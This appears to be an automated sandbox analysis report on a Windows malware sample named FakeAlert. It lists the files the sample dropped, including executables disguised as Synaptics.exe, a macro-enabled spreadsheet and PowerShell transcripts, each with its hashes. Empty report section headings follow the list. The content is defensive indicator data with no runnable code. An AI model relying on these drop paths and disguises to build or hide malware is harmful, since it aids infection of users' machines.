C:\ProgramData\Microsoft\Windows\WER\Temp\WER89B2.tmp.dmp	Mini DuMP crash report, 15 streams, Fri May 27 11:38:39 2022, 0x1205a4 type	AE218CDBEA668F0A4ECA0E0CEEADF10D	734CE669A774BF48825A22E9BD1DCC39B8A925D9	690770416AE3260176AD1AE53068D1482BD614DD03F3BF268D0918ACDF924B1D
C:\ProgramData\Microsoft\Windows\WER\Temp\WERA317.tmp.WERInternalMetadata.xml	XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators	163948AFB76DB7C6562534638BF5F9F3	D28346E8ED8F5DDE8D1A67B95EC925AF83116547	BA59DDBA3876E93D552AAAC43848866ABA08049FA9A7D1A336237026B638B078
C:\ProgramData\Microsoft\Windows\WER\Temp\WERA441.tmp.xml	XML 1.0 document, ASCII text, with CRLF line terminators	30A47CA659D2F001C9D41BAA4A8369C7	F29BCB524E226E1606A450E2E2B9366EBA51A2BB	887F5C49A39A5318BC5D9DBA9CF65F6E886DC80FDC261D0BC3575F2828B796EA
C:\ProgramData\Synaptics\RCXCD96.tmp	PE32 executable (GUI) Intel 80386, for MS Windows	2A1D1C20CCA885322254DD2A22F51097	B1E3866401ECA22981F985C17CB4CD9C36F85486	2B88A30E06873F61842038EC6C0E51B954DB482CD4641E33F01B3E80AF9F168D
C:\ProgramData\Synaptics\Synaptics.exe	PE32 executable (GUI) Intel 80386, for MS Windows	FEDAD1ADEC8A1D90444051B5BDC6445D	41AD10EE96250D8186D02E3D96923163CB664247	8B0667EC191E96C251FCE90FD0DEECCC09F1024F78FAF78B9FF32DED8B7CBB3D
C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\76A735AA-7941-42FC-A093-50DC74F5224B	XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators	B6DC8D4E2DFF6941F586C5A9B70A2113	921C12EDEBDF9568A219D466BE57A60B52F1CE39	7D4B72B2F6CB7F91F5B77DCEF0C9361B3F10AE6E6DF4FF4195DE0DFDA205B733
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	data	9DC3A55F3E37D2EF2B4AEECA7114D94D	B3F041B7C6B144EECEA599808D9CD54FE2B626BE	BE415E1129D4EBAF6A3E5DBF038CBBAC04CFD0DA620DA74467E2C316CC0FE27A
C:\Users\user\AppData\Local\Temp\6D6YYf5.ini	HTML document, UTF-8 Unicode text, with very long lines, with no line terminators	B5C49CC9E8DC5BB7979D44D737899DB3	1CB0774BDC9C65E0A64F7FA8D823794C9D8A9161	D2FE0124264D63EA2EB3FF79940B41F1985012D54E84F3570C15EE9A1EB1EB48
C:\Users\user\AppData\Local\Temp\79Qsp1R.ini	HTML document, UTF-8 Unicode text, with very long lines, with no line terminators	4309ACA8FE965CECD1BE6514FFECE3B4	7D3CB895EA60DF7EABC9F6782A550855CAA46B85	1333C16A831C61707FB22D3D5C0C5538697F404F5D48873946721B260A66963F
C:\Users\user\AppData\Local\Temp\9nIC29m.ini	HTML document, UTF-8 Unicode text, with very long lines, with no line terminators	B7701E37A612013DF67A0990CE2D81BC	0814185B4905AEBCE392297D16D0CFCBC864E140	CE9010DF0F130D27BAE288151624008B28320FCC19690062AF3F7431538F7F73
C:\Users\user\AppData\Local\Temp\A74oXdM.ini	HTML document, UTF-8 Unicode text, with very long lines, with no line terminators	12084AEDF546294AFA8CB823217F89A1	38F8AFC0D5FD9F242496295C97B53F353D171DDD	A6CF48D32BC467AA5B5A963653525AFF89DF1540289870BA462D4D9B8C46F169
C:\Users\user\AppData\Local\Temp\AEB8Tw9.ini	HTML document, UTF-8 Unicode text, with very long lines, with no line terminators	2EC6D02BC24F3CBCF138E77C18D63CE2	4AF05824DF9A13E2B5516E620F724839CA4515BF	EA55864C1F586EEC4423D483518C866D583552A7B23783A7DD23BDDCCC63DFEA
C:\Users\user\AppData\Local\Temp\Ap7UmLD.ini	HTML document, UTF-8 Unicode text, with very long lines, with no line terminators	CDAD74A4440693FE98FF06D1C92F8264	04E96DB5A6D5DF6C8E6ABD706D9F85AFE32C1691	0CDA8EAA8B2B3B3C8CAED6449AFD34516F1AC6BD3EA2E3FE7853CA563F7BD624
C:\Users\user\AppData\Local\Temp\CrVbcG3.ini	HTML document, UTF-8 Unicode text, with very long lines, with no line terminators	40541C44E1A2C92BBB011980646390BD	E8CB7690FAEEA6EB26377114E68AA888E08EDB5D	0945F65B1D726D99B2AF379BD9345FDF5CF72D90E67F41B0A2D196F7C9BBC0B9
C:\Users\user\AppData\Local\Temp\Forfrelses5.kni	data	4AAB1798D3B3A95F833CB8A3EBBD45B5	07C3BD47B41080B20A7D05543E8B055AD0CAA3E1	3B171F2E59DFDFDA8F1198FF352A15E65ADCED5F7148795369489179A58D6DB0
C:\Users\user\AppData\Local\Temp\Fp5pWOv.ini	HTML document, UTF-8 Unicode text, with very long lines, with no line terminators	0E40F1B3BE2664251A057C3C25F8B40C	CF6DDA64F15CAFE718359A496DF91EBA631901E2	E99333046DF17A07F917AE29132218E35857E325FB2F40F81ED003FBB281D8B4
C:\Users\user\AppData\Local\Temp\HEaQKbm.ini	HTML document, UTF-8 Unicode text, with very long lines, with no line terminators	DD6782F34D39587DF9A63777FAECA595	D3935DE2AC954B7F19372020F25E844EED74450F	34C81BAAE33FFAF55720E9575AF7F203887FACD303DE421ABBDE4CAD946DF5B9
C:\Users\user\AppData\Local\Temp\Hk28YM9.ini	HTML document, UTF-8 Unicode text, with very long lines, with no line terminators	9E40F5F14B4F270901DA7439511A82A3	D5F454B26EDFDE8939F94AEA30D5C32D39BC9A25	E01B891EB7E80E95E7AD94B530E4F2246A0EC1DF87CAE6E629D0B76223F8DE84
C:\Users\user\AppData\Local\Temp\JcTixxK.ini	HTML document, UTF-8 Unicode text, with very long lines, with no line terminators	7EE89D6391026DF4F7831C95A0D0D2D3	AACB402DE6CA661E9346EDBAF8E25E0668E71B85	7DD1E65FD2E54204988F375A511A39CA731E409D5BC85FC3D522A7CBD5C6C82B
C:\Users\user\AppData\Local\Temp\KrD7UxG.ini	HTML document, UTF-8 Unicode text, with very long lines, with no line terminators	951AF258DBAE8260C49BB520432A78DE	016D5366299873206982A115616B35A7F5F7C077	5CFB033F81E0E29DDB3AD643CF1E51C48379648953DFC6C95815F8DBCA01ACFC
C:\Users\user\AppData\Local\Temp\MTLdFLE.ini	HTML document, UTF-8 Unicode text, with very long lines, with no line terminators	73B8E5C9530F9B089BDC0E8BD4C55E82	D0CE08FDA40B66BD46CA476A315F83A615EDF44B	910FD2969B0D31D04CE0D720A60310FC30E0397A73516D079CA3D32949FBEC2B
C:\Users\user\AppData\Local\Temp\NDyKofJ.ini	HTML document, UTF-8 Unicode text, with very long lines, with no line terminators	1C68CB7AFAAC18F9B253C9BFAA1A4A77	147297220FC5CD3DB80FB9DBFCEDBEF1F7AE957B	B0008F58F98D780737C82F7CB2AACB591AB45B2DA477920166465D49BF4F6B9B
C:\Users\user\AppData\Local\Temp\OBixP3cz.xlsm	Microsoft Excel 2007+	E566FC53051035E1E6FD0ED1823DE0F9	00BC96C48B98676ECD67E81A6F1D7754E4156044	8E574B4AE6502230C0829E2319A6C146AEBD51B7008BF5BBFB731424D7952C15
C:\Users\user\AppData\Local\Temp\QwRBqv2.ini	HTML document, UTF-8 Unicode text, with very long lines, with no line terminators	B552D4446D24C0E0360ABDA8E674FA5A	88301C130D245EC9B011507B3AF2E12F2F3056DC	51B049D1E454DBC7329297F223F3F507F35BF1D72350C31B4604415576085D64
C:\Users\user\AppData\Local\Temp\RCXDA77.tmp	PE32 executable (GUI) Intel 80386, for MS Windows	65B8E77E293A905F0AC7289E01DCB715	C4326E7DE95466D022BFC4B79D5BC9CC3859DE84	0BC82DCB41571412B308716DB19E9F721A7A304B1BEE76A3B9AFB327B32612F8
C:\Users\user\AppData\Local\Temp\RCXF979.tmp	PE32 executable (GUI) Intel 80386, for MS Windows	FA4C249127C8D6D3661A369551570EB3	BB1FAA2CD5C36DC224BF162B6C7D381F91A49431	4B7D1627FBFEFB6B1E47A2AF6E4EC95A542C219EACA1AEF57949FA76378D65A1
C:\Users\user\AppData\Local\Temp\REi9Htc.ini	HTML document, UTF-8 Unicode text, with very long lines, with no line terminators	DC79684C67DB88D6BDAD338CC8F33238	FCC271B2BD3B132022BC39DA2AD5508BBBFD8D8C	7B3F6C53CDCE17EC2A2F675746B40DD04BC08651D883ECB1FA3A04D13B4D64D4
C:\Users\user\AppData\Local\Temp\Stopes204.lnk	MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=hide	CC1F1A79320338AFABD0947DE0744BCD	53780A426BE2BCA09043E5EEB1AEBC4651FAC0F6	2AE7C3D23C798A2CA5B95AE8957F0BF23A83E8613E165526986123500F69BCF3
C:\Users\user\AppData\Local\Temp\U5UjEkM.ini	HTML document, UTF-8 Unicode text, with very long lines, with no line terminators	FD58B50DF74A98E3CE307B686FF10A1F	3BB2373822783BB728FC46C377368116D3688DF3	358BB4E4BC103F18FE910C9AC6EA0475D278CE1AE607F939E366F32A98B348EB
C:\Users\user\AppData\Local\Temp\WGLMqHD.ini	HTML document, UTF-8 Unicode text, with very long lines, with no line terminators	E2758FD1176B9AD6ED0FF37218FEEADD	4398397BDD01476D7941382F3CF970E6E782BCBC	FB5FDF88CBA7C5609DB0C30E70BA6B04A91C37DCDB18F13522973BA79F89AE9A
C:\Users\user\AppData\Local\Temp\Y1lkYiF.ini	HTML document, UTF-8 Unicode text, with very long lines, with no line terminators	4A3172B7B315A3184E83E3DA82A7A8F6	CF4388AAE5812EC2C4125C7704665CDC897E3487	68E85F5B7F2E62C75DC638710D00678D2EF573BBCCB33786A1112D0C870D0658
C:\Users\user\AppData\Local\Temp\YC9w8Aif.exe	PE32 executable (GUI) Intel 80386, for MS Windows	2A1D1C20CCA885322254DD2A22F51097	B1E3866401ECA22981F985C17CB4CD9C36F85486	2B88A30E06873F61842038EC6C0E51B954DB482CD4641E33F01B3E80AF9F168D
C:\Users\user\AppData\Local\Temp\YC9w8Aif.ico	MS Windows icon resource - 1 icon, 32x32, 32 colors	076675FE01F793F7DFFE82D24F4E806A	2E2E04D353C34A60E3B5CCBE0C3D120FE719B656	CB54C21B707D3879D091A49D459B1BE287B922952286B55EF1DFB7249C21A93C
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iivijlnh.tvc.psm1	very short file (no magic)	C4CA4238A0B923820DCC509A6F75849B	356A192B7913B04C54574D18C28D46E6395428AB	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lqiaigga.n0f.ps1	very short file (no magic)	C4CA4238A0B923820DCC509A6F75849B	356A192B7913B04C54574D18C28D46E6395428AB	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sqjqhruh.5xf.psm1	very short file (no magic)	C4CA4238A0B923820DCC509A6F75849B	356A192B7913B04C54574D18C28D46E6395428AB	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tfhs1qp5.1e4.ps1	very short file (no magic)	C4CA4238A0B923820DCC509A6F75849B	356A192B7913B04C54574D18C28D46E6395428AB	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
C:\Users\user\AppData\Local\Temp\cacert.pem	HTML document, ASCII text, with CRLF line terminators	5343C1A8B203C162A3BF3870D9F50FD4	04B5B886C20D88B57EEA6D8FF882624A4AC1E51D	DC1D54DAB6EC8C00F70137927504E4F222C8395F10760B6BEECFCFA94E08249F
C:\Users\user\AppData\Local\Temp\gDI1ITp.ini	HTML document, UTF-8 Unicode text, with very long lines, with no line terminators	4C48E0B87A4974DA3DE8457A715269D3	DDB4D66024C5BA01BC25E48D0395C8B41A2682EF	23C673444C8F195FEB25442859855FA082B349C9AC651D869131BFD6FE901964
C:\Users\user\AppData\Local\Temp\hbqA6yu.ini	HTML document, UTF-8 Unicode text, with very long lines, with no line terminators	4B9B6FD7A34D94AD24A87D76D3FDD2C3	8141F00B616B6CA841ED57D82EB1EB0B7613A12C	D21DBDEECCD85A7EB3C3BA85F8DF0D45902787F488BF1270B19A6853F6D5F13F
C:\Users\user\AppData\Local\Temp\is9f5lp.ini	HTML document, UTF-8 Unicode text, with very long lines, with no line terminators	176F1492E63CC1F711735979D8A32171	035F7B4A86A3DD76CDAD7A682040F69997FA44F1	5CB68617B56B399933755F09D64E5B3032E98F018FEDDADC0C5881C44A5861EE
C:\Users\user\AppData\Local\Temp\kKBEMnN.ini	HTML document, UTF-8 Unicode text, with very long lines, with no line terminators	34E8A34A8823300FE9E6C2D1ECB4625C	EF1DF33551C1F46F8E2EAAC6399B96857EC3DE23	E0B88938C54900BB7A6AF22DA6A9862D79C04560566DCBC875A54EB5E8C4A847
C:\Users\user\AppData\Local\Temp\nnXaK8k.ini	HTML document, UTF-8 Unicode text, with very long lines, with no line terminators	03C4197A74BD1FF6F45FB95D05FCA272	2988F1E5E719189717A4C3C570F7A51E5ADBB493	EE86F8E80C639AE711C59ADB3AD51C3C6CBF4A7AD6CE97F79D405198678F5809
C:\Users\user\AppData\Local\Temp\nsbCCFB.tmp\System.dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	CFF85C549D536F651D4FB8387F1976F2	D41CE3A5FF609DF9CF5C7E207D3B59BF8A48530E	8DC562CDA7217A3A52DB898243DE3E2ED68B80E62DDCB8619545ED0B4E7F65A8
C:\Users\user\AppData\Local\Temp\olE9oXI.ini	HTML document, UTF-8 Unicode text, with very long lines, with no line terminators	1777D1776247C1C150D1386480A52D5F	0A6B244BCD6F0C091C3702956E626F102EA0ECB5	6758A377D86B503565A8E871C887D7AD9401E05677514C422913B0C6C2463182
C:\Users\user\AppData\Local\Temp\open-menu-symbolic.symbolic.png	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced	89B8C9C7F53554F3C57C1BF4881BC0CA	D3231B624F8C2DD2A569F0B87BD58162412CF5C8	E5BDA8AF2A41C34F47054318E16508C53718ED641D1404F7C33E1DD1E6142184
C:\Users\user\AppData\Local\Temp\p3Ti5MN.ini	HTML document, UTF-8 Unicode text, with very long lines, with no line terminators	B6FB539BCAB3116CEA69C000B9D74B91	91DCBEA37B11FE5EE1CA774848DD144AA19B6FA1	94CC356127E3401D9F37DDC60770E6B051802B1D0EB7EAF292A03C5D7EE24DAC
C:\Users\user\AppData\Local\Temp\sGgz8WE.ini	HTML document, UTF-8 Unicode text, with very long lines, with no line terminators	BD38955B991754EFE470B8DD1FDDF581	D3E2177D57A5622FDA732CBF9F2315F1974924D0	39E3B7C900CD1A506A61DC377E9DC0FBDA1FA1A56F468AC4C6B53BE210A758FA
C:\Users\user\AppData\Local\Temp\tARkXYN.ini	HTML document, UTF-8 Unicode text, with very long lines, with no line terminators	354E2C57D378E5EA6BC9709146EAD0BC	CA1F92B59F6E49813EE4C3B224DCBE188B482728	EC8F675F0B39B4FE025E1E1FFEE9EAD23C18F22A578407CFB061059C2EC5C1A8
C:\Users\user\AppData\Local\Temp\td7DLxd.ini	HTML document, UTF-8 Unicode text, with very long lines, with no line terminators	0E6661BB2B5A360FAD648504CFAB865F	DA492B9CB24E48B17B969E3B3D963519F97F099F	E06FF37FA3DE709ACC66E9504BF60F44F395DE2E51588D7BFA944AEBD532FA7A
C:\Users\user\AppData\Local\Temp\udfrielser.ini	ASCII text, with CRLF line terminators	9ACAEC3B95B7873B0B438825AA485B5B	8A7A84F97759EE701402C96B0B5427E031AA92CD	13B015F0138E1D08D4A91CA186CF126CAD93ED8F2900457EA1212E816D70BCC5
C:\Users\user\AppData\Local\Temp\uniformerede.exe	PE32 executable (GUI) Intel 80386, for MS Windows	FEDAD1ADEC8A1D90444051B5BDC6445D	41AD10EE96250D8186D02E3D96923163CB664247	8B0667EC191E96C251FCE90FD0DEECCC09F1024F78FAF78B9FF32DED8B7CBB3D
C:\Users\user\Desktop\._cache_uniformerede.exe	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive	C4B2332489C0BA3E3F2A262F1C2C31B8	9EB3D3CB6B4F160F4DC5A8921A8483A145E814FC	9E5C0EB06D969F8DD4844C1ABAB791C59FEBDDDD82A5239CBCBEB4570DF07A06
C:\Users\user\Desktop\SecuriteInfo.com.Variant.FakeAlert.2.24488.exe	PE32 executable (GUI) Intel 80386, for MS Windows	FA4C249127C8D6D3661A369551570EB3	BB1FAA2CD5C36DC224BF162B6C7D381F91A49431	4B7D1627FBFEFB6B1E47A2AF6E4EC95A542C219EACA1AEF57949FA76378D65A1
C:\Users\user\Documents\20220527\PowerShell_transcript.701188.PEGMRVYd.20220527043744.txt	UTF-8 Unicode (with BOM) text, with CRLF line terminators	D69467F265F7D0E645CA865DEACA44D9	874D64130A943BE590F623C1A35D3E7276035C82	715C6B499837F4C13A8ADE747B1B73A2C66137F495324F6D4FD173BECFB717B2
C:\Users\user\Documents\20220527\PowerShell_transcript.701188.kN_b0V1N.20220527043800.txt	UTF-8 Unicode (with BOM) text, with CRLF line terminators	0AB05038288EB62F928B5796E3AB532F	A4A7A5967536C785C37C11362D29E12274F9D95A	CF1228D74864069EE2EE22E31725F4716D07F8EF048DC87260AA53696EC5CCBD
C:\Users\user\Documents\DUUDTUBZFW\EOWRVPQCCS.xlsm	Microsoft Excel 2007+	E566FC53051035E1E6FD0ED1823DE0F9	00BC96C48B98676ECD67E81A6F1D7754E4156044	8E574B4AE6502230C0829E2319A6C146AEBD51B7008BF5BBFB731424D7952C15
C:\Users\user\Documents\DUUDTUBZFW\~$EOWRVPQCCS.xlsx	data	7AB76C81182111AC93ACF915CA8331D5	68B94B5D4C83A6FB415C8026AF61F3F8745E2559	6A499C020C6F82C54CD991CA52F84558C518CBD310B10623D847D878983A40EF
C:\Users\user\Documents\DUUDTUBZFW\~$cache1	PE32 executable (GUI) Intel 80386, for MS Windows	2A1D1C20CCA885322254DD2A22F51097	B1E3866401ECA22981F985C17CB4CD9C36F85486	2B88A30E06873F61842038EC6C0E51B954DB482CD4641E33F01B3E80AF9F168D

Windows Analysis Report SecuriteInfo.com.Variant.FakeAlert.2.24488.8627

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report
SecuriteInfo.com.Variant.FakeAlert.2.24488.8627